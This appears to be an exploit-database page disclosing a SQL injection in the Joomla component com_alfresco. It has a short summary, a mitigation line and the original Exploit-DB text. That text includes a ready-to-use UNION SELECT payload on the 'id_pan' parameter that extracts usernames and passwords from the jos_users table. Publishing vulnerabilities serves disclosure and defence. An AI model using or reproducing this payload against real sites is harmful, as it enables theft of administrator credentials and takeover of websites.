header-logo
Suggest Exploit
vendor:
com_alfresco
by:
FL0RiX
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_alfresco
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla Component com_alfresco SQL Injection Vulnerability

An SQL injection vulnerability exists in the Joomla component com_alfresco. An attacker can exploit this vulnerability to gain access to the admin login credentials. This can be done by sending a maliciously crafted HTTP request to the vulnerable server. The vulnerable parameter is 'id_pan' which can be manipulated to inject malicious SQL code.

Mitigation:

Input validation should be used to filter out malicious characters.
Source

Exploit-DB raw data:

<------------------- header data start ------------------- >

#############################################################
#  Joomla Component com_alfresco SQL Injection Vulnerability
#############################################################

# Author          : FL0RiX

# Name            : com_alfresco

# Greez           : PyskE,Dr.Kacak And All Friends

# Bug Type        : SQL Injection

# Infection       : Admin login bilgileri alinabilir.

# Demo Vuln.      :

http://server/index.php?option=com_alfresco&task=edit&id_pan=[SQL INJ.]

# Bug Fix Advice : Zararli karakterler filtrelenmelidir.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?option=com_alfresco&task=edit&id_pan=null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rixf0r3v3r,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/from/**/jos_users--

< -- bug code end of -- >